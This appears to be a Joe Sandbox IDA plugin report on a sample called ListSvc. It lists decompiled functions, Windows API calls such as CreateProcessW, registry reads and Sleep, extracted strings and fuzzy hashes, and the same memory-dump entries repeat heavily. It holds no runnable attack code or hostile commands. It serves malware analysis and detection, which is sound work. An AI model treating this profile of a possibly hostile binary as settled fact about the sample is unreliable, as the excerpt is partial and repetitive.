Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: Text$CriticalEnterExtentMetricsObjectPointReleaseSectionSelect
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
API String ID: 1334710084-222967699
Opcode ID: 325bd83ac94b98e0ccaeb91b867b8168358bc3f43770baf6a1d651e33ba30b3f
Instruction ID: 68d2e7468c57547273e36bf030651d7f5f3d68c5ac32077f2b8cb66f1dd3ef54
Opcode Fuzzy Hash: 325bd83ac94b98e0ccaeb91b867b8168358bc3f43770baf6a1d651e33ba30b3f
Instruction Fuzzy Hash: 8E01847AA14204BFE704DEE9CC42F9EB7ECEB49704F510469F604E7280D678AD008724

Uniqueness

Uniqueness Score: -1.00%

Function 00409EF8, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 00409F28
FreeLibrary.KERNEL32(00400000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 00409FD0
ExitProcess.KERNEL32(00000000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 0040A009

Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?,0040707B), ref: 00409E99
Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409E9F
Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?), ref: 00409EBA
Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?), ref: 00409EC0

Strings

MZP, xrefs: 00409FCF

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
String ID: MZP
API String ID: 3490077880-2889622443
Opcode ID: 19759392ed06106502a1c1b2e6486d6f2820d04f59653749a07cc7070f676968
Instruction ID: e2cc099636b1ff89dc3d2fe7d8b391202ea9480b4d839bd65efd70e323d436a8
Opcode Fuzzy Hash: 19759392ed06106502a1c1b2e6486d6f2820d04f59653749a07cc7070f676968
Instruction Fuzzy Hash: 60316F20B006429AD720AB7A9484B2777E66B44328F14053FE449E62E3D7BCDCC4C75D

Uniqueness

Uniqueness Score: -1.00%

Function 00409EF0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 00409F28
FreeLibrary.KERNEL32(00400000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 00409FD0
ExitProcess.KERNEL32(00000000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 0040A009

Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?,0040707B), ref: 00409E99
Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409E9F
Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?), ref: 00409EBA
Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?), ref: 00409EC0

Strings

MZP, xrefs: 00409FCF

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
String ID: MZP
API String ID: 3490077880-2889622443
Opcode ID: 86ca27ab4cbfe576b0a3ee541a0fe11273007b0e3819c982b8d9582f61fa1f39
Instruction ID: 07d30fd0877b4d42c88f7c1dd8669400ca79996a2773cdc214a63d44a36a60ff
Opcode Fuzzy Hash: 86ca27ab4cbfe576b0a3ee541a0fe11273007b0e3819c982b8d9582f61fa1f39
Instruction Fuzzy Hash: C4316E20A007828ADB21AB769494B2777E26F15318F14487FE049E62E3D7BCDCC4C71E

Uniqueness

Uniqueness Score: -1.00%

Function 0060C038, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32 ref: 0060C08C
GetLastError.KERNEL32(00000000,00000000,006D579C,?,?,XMb,00000000,>Mb,?,00000000,00000000,0060C0B2,?,?,00000000,00000001), ref: 0060C094

Strings

>Mb, xrefs: 0060C072, 0060C075
XMb, xrefs: 0060C07A, 0060C07D

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: CreateErrorLastProcess
String ID: >Mb$XMb
API String ID: 2919029540-2660256435
Opcode ID: fc70ad85d2157d21ba367755dea5396487fa079e60854658823ca55dcf81e298
Instruction ID: 6fed8a1d79b3fe7fb7c31d778b9d5703ccb9eb2a1393ada51090ba1ca1dee2d9
Opcode Fuzzy Hash: fc70ad85d2157d21ba367755dea5396487fa079e60854658823ca55dcf81e298
Instruction Fuzzy Hash: DA113972640208AFCB54DFA9DC81DDFB7ECEB4D320B518666F908D3280D635AE108BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00626F48, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 005C7A14: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,005C80EE,?,00000000,?,005C808E,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C7A30

RegCloseKey.ADVAPI32(00000000,?,00000001,00000000,00000003,00626DA0,00000003,00000000,006270EB,00000000,006272A5,?,00626DA0,?,00000000,00000000), ref: 00626F95

Strings

InstallRoot, xrefs: 00626F84
SOFTWARE\Microsoft\.NETFramework, xrefs: 00626F6A
.NET Framework not found, xrefs: 00626FA4

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: CloseOpen
String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
API String ID: 47109696-2631785700
Opcode ID: cda95d6e92defb5476691493b7d59d62c1fa9335c75e1bc5c16bb959f18c3f17
Instruction ID: de5110e5fa14fd350821f7972f2051635d336fb801c9b7b6397190480774c976
Opcode Fuzzy Hash: cda95d6e92defb5476691493b7d59d62c1fa9335c75e1bc5c16bb959f18c3f17
Instruction Fuzzy Hash: 48F0FF31B05524AFEB10EB49FC41B5A6B9BDB85310F50213AF184C3281E631DC018BA2

Uniqueness

Uniqueness Score: -1.00%

Function 004785F8, Relevance: 6.1, APIs: 4, Instructions: 59registryCOMMON

Download Yara Rule

APIs

GetClassInfoW.USER32 ref: 00478619
UnregisterClassW.USER32 ref: 00478642
RegisterClassW.USER32 ref: 0047864C
SetWindowLongW.USER32 ref: 00478697

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: Class$InfoLongRegisterUnregisterWindow
String ID:
API String ID: 4025006896-0
Opcode ID: c13718059519df6099dbd22287901c2cd341ee5024df696f59e832b4f8273898
Instruction ID: 194e1b82028893281538589df9a22bcce55ada3cdaffe31495447ecbac098301
Opcode Fuzzy Hash: c13718059519df6099dbd22287901c2cd341ee5024df696f59e832b4f8273898
Instruction Fuzzy Hash: D501C4716452057BCB10EB98EC85FDF739EE758314F10811AF508E7391CA39E9418BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0060EFD8, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

WaitForInputIdle.USER32 ref: 0060F004
MsgWaitForMultipleObjects.USER32 ref: 0060F026
GetExitCodeProcess.KERNEL32 ref: 0060F037
CloseHandle.KERNEL32(00000001,0060F064,0060F05D,?,?,?,00000001,?,?,0060F406,?,00000000,0060F41C,?,?,?), ref: 0060F057

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
String ID:
API String ID: 4071923889-0
Opcode ID: b2c0e9a815401a59890ae953dc8cc514a32d7d884ad163320893ed3959533c1a
Instruction ID: 3bf9388a4eab4805cc6f518967bcd8e0b9f61bd1b59095cebcc575be48bbaf87
Opcode Fuzzy Hash: b2c0e9a815401a59890ae953dc8cc514a32d7d884ad163320893ed3959533c1a
Instruction Fuzzy Hash: 24012D70A80308BEEB3497A58D16FEBBBADDF45760F510536F604C36C2D5759D40C664

Uniqueness

Uniqueness Score: -1.00%

Function 006ACABC, Relevance: 6.0, APIs: 4, Instructions: 34sleepCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 006ACADC
GetLastError.KERNEL32 ref: 006ACAE6
GetTickCount.KERNEL32 ref: 006ACAF0
Sleep.KERNEL32(00000032), ref: 006ACB00

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: ErrorLast$CountSleepTick
String ID:
API String ID: 2227064392-0
Opcode ID: 66301a0a26332de94f541b13cc40e963d91ad8f3bd11375468a19028b1306bfa
Instruction ID: 650aecd8dda8324acb9ef1ef12543e615cdaddf0aa48ac4ca6bdf88ba774c7be
Opcode Fuzzy Hash: 66301a0a26332de94f541b13cc40e963d91ad8f3bd11375468a19028b1306bfa
Instruction Fuzzy Hash: 2AE02B7234838094D725356E58864BE8D5ACFC3376F280A3FF0C4D2182C4058D85C576

Uniqueness

Uniqueness Score: -1.00%

Function 006AE3C8, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 158windowCOMMON

Download Yara Rule

APIs

SendNotifyMessageW.USER32(00050392,00000496,00002711,-00000001), ref: 006AE618

Strings

MS PGothic, xrefs: 006AE46C, 006AE47F
(\m, xrefs: 006AE404, 006AE418, 006AE50E, 006AE527, 006AE540, 006AE559, 006AE572, 006AE5BD, 006AE5D3, 006AE5E9

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: MessageNotifySend
String ID: (\m$MS PGothic
API String ID: 3556456075-219475269
Opcode ID: 2500a480fbb503b296a3365eb03bbe38222c632a9ea8e700226d7071bd3521c7
Instruction ID: c4b29eded5dd607060819086577383edb80d612be209ecb45f272f1b38c29540
Opcode Fuzzy Hash: 2500a480fbb503b296a3365eb03bbe38222c632a9ea8e700226d7071bd3521c7
Instruction Fuzzy Hash: 295150347011448BC700FF69D88AE5A77E3EB9A308B54557AF4049F366CA7AEC42CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0060D530, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,0060D629,?,006D579C,?,00000003,00000000,00000000,?,006AC8F3,00000000,006ACA22), ref: 0060D578
GetLastError.KERNEL32(00000000,00000000,?,00000000,0060D629,?,006D579C,?,00000003,00000000,00000000,?,006AC8F3,00000000,006ACA22), ref: 0060D581

Strings

.tmp, xrefs: 0060D561

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: .tmp
API String ID: 1375471231-2986845003
Opcode ID: 7e252bd83ff95b71af820973b8230fb04739544441579268b50ffd476fc0b7f1
Instruction ID: 90e89e80a8d15c693f6baa1c53929b57ef88e13b94ce627ec608a80cc6a9e7e5
Opcode Fuzzy Hash: 7e252bd83ff95b71af820973b8230fb04739544441579268b50ffd476fc0b7f1
Instruction Fuzzy Hash: F4219975A502089FDB05EBE4CC51EEEB7B9EB88304F10457AF901F3381DA75AE058B64

Uniqueness

Uniqueness Score: -1.00%

Function 006ACB10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 006ACB58

Strings

Failed to remove temporary directory: , xrefs: 006ACB7A
bm, xrefs: 006ACB3A

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: CountTick
String ID: Failed to remove temporary directory: $bm
API String ID: 536389180-2673898769
Opcode ID: bfd70c40cb1ad8d181033c251dcb3b43325d86ef4477ff23258a823bd8f54122
Instruction ID: 78e05ed3d0f448852bd59dbbb99a4cbd83d81d15065c7e17e95d6b7c04c680f0
Opcode Fuzzy Hash: bfd70c40cb1ad8d181033c251dcb3b43325d86ef4477ff23258a823bd8f54122
Instruction Fuzzy Hash: 9401D430610704AAD751FB75EC47F9A73979B46B10F51046AF500A72D2D7769C40CA28

Uniqueness

Uniqueness Score: -1.00%

Function 006AC180, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,006AC56B,00000000,006AC586,?,00000000,00000000,?,006B7B68,00000006), ref: 006AC1E2

Strings

RegisteredOrganization, xrefs: 006AC1D1
RegisteredOwner, xrefs: 006AC1BF

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: Close
String ID: RegisteredOrganization$RegisteredOwner
API String ID: 3535843008-1113070880
Opcode ID: bd898d473dd1f21ff1d6f1f73f3955f0af61235c1559c7df92e3e59f0577a32c
Instruction ID: ca4fc0b31771868649da923643cba903dbb3fbd6f1f7080981924f9495942079
Opcode Fuzzy Hash: bd898d473dd1f21ff1d6f1f73f3955f0af61235c1559c7df92e3e59f0577a32c
Instruction Fuzzy Hash: E8F09030744108AFE700EAD4DC56BAA7B9FE787714F60106AF1008BB82C630AE00CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00414DA0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 00414DDF

Strings

TWindowDisabler-Window, xrefs: 00414DDD

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: CreateWindow
String ID: TWindowDisabler-Window
API String ID: 716092398-1824977358
Opcode ID: b8b775b51f73ca30bac71de3a5aa2dd226752c973776daaf732847dd1bb66243
Instruction ID: a9fb6cbc93b7d8fca137cee03195aa1e05eb631c50c99d8148995e53eb0ae486
Opcode Fuzzy Hash: b8b775b51f73ca30bac71de3a5aa2dd226752c973776daaf732847dd1bb66243
Instruction Fuzzy Hash: 7BF092B2604158BF9B80DE9DDC81EDB77ECEB4D2A4B05416AFA0CE3201D634ED118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 006AC0D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39registryCOMMON

Download Yara Rule

APIs

Part of subcall function 005C7A14: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,005C80EE,?,00000000,?,005C808E,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C7A30

RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,006B813A,?,006AC32E,00000000,006AC586,?,00000000,00000000), ref: 006AC115

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 006AC0E7

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: CloseOpen
String ID: Software\Microsoft\Windows\CurrentVersion
API String ID: 47109696-1019749484
